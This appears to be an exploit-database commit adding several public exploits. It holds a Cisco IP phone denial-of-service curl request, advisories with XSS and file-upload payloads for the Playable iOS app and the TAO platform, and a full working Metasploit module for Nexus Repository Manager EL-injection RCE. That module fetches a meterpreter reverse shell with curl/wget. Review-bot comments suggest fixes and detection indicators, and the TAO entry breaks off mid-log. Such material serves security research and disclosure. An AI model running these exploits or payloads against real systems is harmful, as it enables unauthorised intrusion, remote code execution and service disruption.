DB: 2020-04-18
6 changes to exploits/shellcodes

Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
Nexus Repository Manager - Java EL Injection RCE (Metasploit)
Playable 9.18 iOS - Persistent Cross-Site Scripting
TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
Cisco IP Phone 11.7 - Denial of service (PoC)
parent c3e827f657
commit 189c8b52c9
7 changed files with 1252 additions and 0 deletions
13
exploits/hardware/webapps/48342.txt
Normal file
@ -0,0 +1,13 @@
# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24

curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
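Review bot: The PoC gives the request but not the observable effect, so a tester cannot tell a successful reproduction from a benign response; add one line describing what the phone does after the request (the title says Denial of Service and the Cisco advisory id contains rce-dos) and state explicitly that 11.7(1) is the fixed release, which '# Version: Before 11.7(1)' only implies. Also mark phone_address as a placeholder to be replaced and note that the curl command spans two lines here only for display.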
423
exploits/ios/webapps/48340.txt
Normal file
@ -0,0 +1,423 @@
# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
# CVE: N/A

Document Title:
===============
Playable v9.18 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2198


Release Date:
=============
2020-04-16


Vulnerability Laboratory ID (VL-ID):
====================================
2198


Common Vulnerability Scoring System:
====================================
7.3


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod
Touch without conversion -
just copy files to your device through iTunes or over Wifi! To search
for closed captions /
subtitles select a video then press the magnifying glass icon to the top
right of the video.

(Copy of the Homepage:
https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
vulnerabilities in the official Playable v9.18 apple ios mobile application.


Affected Product(s):
====================
Portable Ltd
Product: Playable v9.18 - iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
A persistent script code injection web vulnerability has been discovered
in the official Playable v9.18 apple ios mobile application.
The vulnerability allows remote attackers to inject own malicious
persistent script codes to the application-side for manipulation.

The vulnerability is located in the filename parameter of the upload
module. Attackers with wifi access are able to perform uploads
with malicious script code to manipulation the mobile application ui.
The request method to inject is POST and the attack vector of
the vulnerability is persistent. Attackers are able to inject html and
javascript codes to comrpomise the mobile wifi web-application.
The injection point is the upload form on localhost:8881 and the
execution occurs on localhost:80 with the visible ui listing.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected mobile
application modules.

Request Method(s):
[+] POST

Vulnerable Function(s):
[+] upload

Vulnerable Parameter(s):
[+] filename


1.2
An arbitrary file upload web vulnerability has been discovered in the
official Playable v9.18 apple ios mobile application.
The arbitary file upload vulnerability allows remote attackers to upload
malicious files to compromise the mobile application.

The vulnerability is located in the filename parameter of the upload
module. Attackers with wifi access are able to perform
uploads with malicious file extions to bypass the parse function. In a
second step the attacker requests the local file to
execute the malicious content on the local web-server. The request
method to inject is POST and the attack vector of the
vulnerability is located on the application-side. The injection point is
the upload form on localhost:8881. The execution
point becomes visible by a request the localhost:80/vid/[filename] path
with the uploaded file content. The is present
because of a missing file parse and insecure upload handling on file
extensions. As well the local web-server can be
reconfigured to provide more security on user interactions.

Successful exploitation of the arbitrary file upload vulnerability
results in a compromise of the local ios mobile application.

Request Method(s):
[+] POST

Vulnerable Function(s):
[+] upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] /vid/


Proof of Concept (PoC):
=======================
1.1
The persistent script code injection vulnerability can be exploited by
remote attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the ios application
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
2. Start the ios application on your local ios device
3. Start the wifi share service in the application ui
4. Open the web-browser
5. Tamper the http requests
6. Prepare to upload any file and press the upload button
7. Inject as filename any html/js script code payload
8. Continue to transmit the POST method request
9. The file executes on the index listing on port 8881
(http://localhost:8881/index.html)
10. Successful reproduce of the persistent script code injection web
vulnerability!


PoC: Exploitation
>"<iframe src=evil.source onload=alert(document.domain)>.jpg


--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://localhost:8881/upload
Mime Type[text/html]
Request Header:
Host[localhost:8881]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8881/index.html]
Content-Length[8559]
Content-Type[multipart/form-data;
boundary=---------------------------3823323145734]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3823323145734
Content-Disposition: form-data; name="file"; filename=">"<iframe
src=evil.source onload=alert(document.domain)>.jpg"
-
Status: 200[OK]
GET http://localhost/evil.source
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost/evil.source]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[8559]



1.2
the arbitrary file upload vulnerability can be exploited by local
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the ios application
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
2. Start the ios application on your local ios device
3. Start the wifi share service in the application ui
4. Open the web-browser
5. Tamper the http requests
6. Prepare a js file with malicious test content
7. Extend the file name with .jpg
Note: The upload mechanism does not parse or checks for multiple
extensions on file uploads
8. Upload the file by pushing the Upload File button
9. Open the url in the default /vid/ folder and remove the .jpg extension
10. The simple js executes in the scripting engine when opening
11. Successful reproduce of the arbitrary file upload vulnerability!
Note: Using the ftp you can perform to create the file via console
ftp://localhost (read/write permissions)


PoC: Exploitation
http://localhost/vid/clay.js.jpg


--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://localhost:8881/upload
Mime Type[text/html]
Request Header:
Host[localhost:8881]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8881/index.html]
Content-Length[86856]
Content-Type[multipart/form-data;
boundary=---------------------------3823323145733]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3823323145733
Content-Disposition: form-data; name="file"; filename="clay.js.jpg"
-
Status: 200[OK]
GET http://localhost/listVideosJson
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[87]
-
Status: 200[OK]
GET http://localhost/vid/clay.js.jpg
Mime Type[application/iosjpg]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Accept-Ranges[bytes]
Content-Length[86670]
Content-Type[application/iosjpg;]
-
Status: 200[OK]
GET http://localhost/vid/clay.js
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]


Solution - Fix & Patch:
=======================
1.1
The vulnerability can be resolved by a restriction and parse of the
filename parameter. Disallow special chars and restrict inputs.
Encode also the output locations to ensure nobody is able to execute
script code in the main file listing.

1.2
Parse the filename for multiple extensions and prevent that attackers
open specific dangerous file extensions that could
compromise the local application path.


Security Risk:
==============
1.1
The security risk of the script code injection web vulnerability in the
mobile ios application is estimated as high.

1.2
The security risk of the arbitrary file upload vulnerability in the
mobile ios application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
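Review bot: The execution point of finding 1.1 is stated two different ways: the technical description says the injection point is the upload form on localhost:8881 and execution occurs on localhost:80 with the visible ui listing, while PoC step 9 says the file executes on the index listing on port 8881 (http://localhost:8881/index.html); state which listing renders the filename. The 1.2 session log ends with GET http://localhost/vid/clay.js answered with Content-Length[0], which does not show the renamed file's content being served, so the log for the request that actually executes the script (step 10) is missing. Typos to fix before publication: 'comrpomise', 'arbitary', 'extions', 'to manipulation the', and 'The is present' has lost its subject. For the Solution section, the concrete measure for 1.1 is to HTML-encode the filename wherever the listing renders it, and for 1.2 to derive the served Content-Type from an allow-list of known media extensions rather than from whatever trails the last dot.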
196
exploits/linux/remote/48343.rb
Executable file
@ -0,0 +1,196 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Nexus Repository Manager Java EL Injection RCE',
'Description' => %q{
This module exploits a Java Expression Language (EL) injection in Nexus
Repository Manager versions up to and including 3.21.1 to execute code
as the Nexus user.

This is a post-authentication vulnerability, so credentials are required
to exploit the bug. Any user regardless of privilege level may be used.

Tested against 3.21.1-01.
},
'Author' => [
'Alvaro Muñoz', # Discovery
'wvu' # Module
],
'References' => [
['CVE', '2020-10199'],
['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],
['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']
],
'DisclosureDate' => '2020-03-31', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},
'CmdStagerFlavor' => %i[curl wget],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))

register_options([
Opt::RPORT(8081),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Nexus username', 'admin']),
OptString.new('PASSWORD', [true, 'Nexus password'])
])
end

def post_auth?
# Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967
true
end

# Send a GET / request to the server, check the response for a Server header
# containing the Nexus version, and then check if it's a vulnerable version
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless res
return CheckCode::Unknown('Target did not respond to check request.')
end

unless res.headers['Server']
return CheckCode::Unknown('Target did not respond with Server header.')
end

# Example Server header:
# Server: Nexus/3.21.1-01 (OSS)
version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first

unless version
return CheckCode::Unknown('Target did not respond with Nexus version.')
end

if Gem::Version.new(version) <= Gem::Version.new('3.21.1')
return CheckCode::Appears("Nexus #{version} is a vulnerable version.")
end

CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.")
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

print_status("Executing command stager for #{datastore['PAYLOAD']}")

# This will drop a binary payload to disk and execute it!
execute_cmdstager(
noconcat: true,
cookie: login(datastore['USERNAME'], datastore['PASSWORD'])
)
end

def login(username, password)
print_status("Logging in with #{username}:#{password}")

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/service/rapture/session'),
'vars_post' => {
'username' => Rex::Text.encode_base64(username),
'password' => Rex::Text.encode_base64(password)
},
'partial' => true # XXX: Return partial response despite timeout
}, 3.5)

unless res
fail_with(Failure::Unknown, 'Target did not respond to login request')
end

cookie = res.get_cookies

unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/)
fail_with(Failure::NoAccess, 'Could not log in with specified creds')
end

print_good("Logged in with #{cookie}")
cookie
end

# This is defined so that CmdStager can use it!
def execute_command(cmd, opts = {})
vprint_status("Executing command: #{cmd}")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/service/rest/beta/repositories/go/group'),
# HACK: Bypass CSRF token with random User-Agent header
'agent' => rand_text_english(8..42),
'cookie' => opts[:cookie],
'ctype' => 'application/json',
'data' => json_payload(cmd)
)

unless res
fail_with(Failure::Unknown, 'Target did not respond to payload request')
end

unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/)
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
end

print_good("Successfully executed command: #{cmd}")
end

# PoC based off API docs for /service/rest/beta/repositories/go/group:
# http://localhost:8081/#admin/system/api
def json_payload(cmd)
{
'name' => 'internal',
'online' => true,
'storage' => {
'blobStoreName' => 'default',
'strictContentTypeValidation' => true
},
'group' => {
# XXX: memberNames has to be an array, but the API example was a string
'memberNames' => [el_payload(cmd)]
}
}.to_json
end

# Helpful resource from which I borrowed the EL payload:
# https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
def el_payload(cmd)
# HACK: Format our EL expression nicely and then strip introduced whitespace
el = <<~EOF.gsub(/\s+/, '')
${
"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke(
"".getClass().forName("java.lang.Runtime")
).exec("PATCH_ME")
}
EOF

# Patch in our command, escaping any double quotes
el.sub('PATCH_ME', cmd.gsub('"', '\\"'))
end

end
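Review bot: login prints the cleartext password with print_status("Logging in with #{username}:#{password}"), so it lands in the console and in any spooled console log; log only the username or mask the password. The EL expression in el_payload selects java.lang.Runtime.getMethods()[6] by position, and reflection gives no guarantee of method order across JDK builds, so on a target with a different ordering the response will not match /java\.lang\.UNIXProcess@\h+/ and the module stops with Failure::PayloadFailed; that dependency deserves a comment next to the HACK note so the failure is understood. In check, Gem::Version.new('3.21.1-01') <= Gem::Version.new('3.21.1') holds only because Gem::Version treats the '-01' suffix as a prerelease tag that sorts below the plain release; a comment would save the next reader from reading the comparison as a bug. On the defensive side, IOC_IN_LOGS in the Notes block is accurate: the indicator this module leaves is an authenticated POST to /service/rest/beta/repositories/go/group whose memberNames value is an EL expression (${...}), sent with a random User-Agent, all of which appears in the Nexus request log.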
433
exploits/php/webapps/48341.txt
Normal file
@ -0,0 +1,433 @@
# Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.taotesting.com
# Software Link: https://www.taotesting.com/product/
# CVE: N/A

Document Title:
===============
TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web
Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2215


Release Date:
=============
2020-04-16


Vulnerability Laboratory ID (VL-ID):
====================================
2215


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Accelerating innovation in digital assessment. The TAO assessment
platform gives you the freedom, control, and
support to evolve with today's learners. For organizations who want the
freedom to control their assessment
software – from authoring to delivery to reporting.

(Copy of the Homepage: https://www.taotesting.com/product/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
cross site vulnerabilities in the TAO Open Source Assessment Platform
v3.3.0 RC02.


Affected Product(s):
====================
Product: TAO Open Source Assessment Platform v3.3.0 RC02


Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
A html injection web vulnerability has been discovered in the TAO Open
Source Assessment Platform v3.3.0 RC02 web-application.
The vulnerability allows remote attackers to inject own malicious html
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.

The html inject web vulnerability is located in the `userFirstName`,
`userLastName`, `userMail`, `password2`, and `password3`
parameters of the user account input field. The request method to inject
is POST and the attack vector is application-side.
Remote attackers are able to inject html code for the user account
credentials to provoke an execution within the main manage
user listing.

Successful exploitation of the web vulnerability results in persistent
phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Users

Vulnerable Parameter(s):
[+] userFirstName
[+] userLastName
[+] userMail
[+] password2
[+] password3



1.2
|
Multiple persistent cross site web vulnerabilities has been discovered
|
||||||
|
in the TAO Open Source Assessment Platform v3.3.0 RC02.
|
||||||
|
The vulnerability allows remote attackers to inject own malicious script
|
||||||
|
codes with persistent attack vector to compromise browser to
|
||||||
|
web-application requests from the application-side.
|
||||||
|
|
||||||
|
The persistent vulnerability is located in the content parameter of the
|
||||||
|
Rubric Block (Add) module. Attackers are able to inject own malicious
|
||||||
|
script code inside of the rubric name value. The attached values will be
|
||||||
|
redisplayed in the frontend of tao. The request method to inject is
|
||||||
|
POST and the attack vector is located on the application-side. The
|
||||||
|
injection point is the Rubric Block (Add) module and the execution occurs
|
||||||
|
in the frontend panel when listing the item attribute.
|
||||||
|
|
||||||
|
Successful exploitation of the web vulnerability results in session
|
||||||
|
hijacking, persistent phishing attacks, persistent external redirects
|
||||||
|
to malicious source and persistent manipulation of affected or connected
|
||||||
|
application modules.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Rubric Block (Add)
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] content
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The persistent html injection web vulnerability can be exploited by
|
||||||
|
remote attackers with privileged user account and low user interaction.
|
||||||
|
For security demonstration or to reproduce the security web
|
||||||
|
vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Install the application and open the ui
|
||||||
|
2. Move on top right to the user button and click manage users
|
||||||
|
3. Inject html script code payload into the vulnerable input fields
|
||||||
|
4. Save the entry
|
||||||
|
5. Open to the manage users listing
|
||||||
|
Note: The payloads executes in the table that shows the user account
|
||||||
|
values for admins
|
||||||
|
6. Successful reproduce of the html inject vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Vulnerable Source (Manage Users)
|
||||||
|
<th class="actions">Actions</th>
|
||||||
|
</tr></thead>
|
||||||
|
<tbody>
|
||||||
|
<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539">
|
||||||
|
<td class="login"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="firstname"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="lastname"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="email"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="roles">Test Taker</td>
|
||||||
|
<td class="guiLg">German</td>
|
||||||
|
<td class="status"><span class="icon-result-ok"></span> enabled</td>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs (POST) ---
|
||||||
|
http://localhost:89/tao/Users/edit
|
||||||
|
Host: localhost:89
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
|
||||||
|
Gecko/20100101 Firefox/74.0
|
||||||
|
Accept: text/html, */*; q=0.01
|
||||||
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 1393
|
||||||
|
Origin: http://localhost:89
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer:
|
||||||
|
http://localhost:89/tao/Main/index?structure=users&ext=tao§ion=edit_user
|
||||||
|
Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj;
|
||||||
|
tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004
|
||||||
|
user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_
|
||||||
|
rdf-schema_3_label=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539
|
||||||
|
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
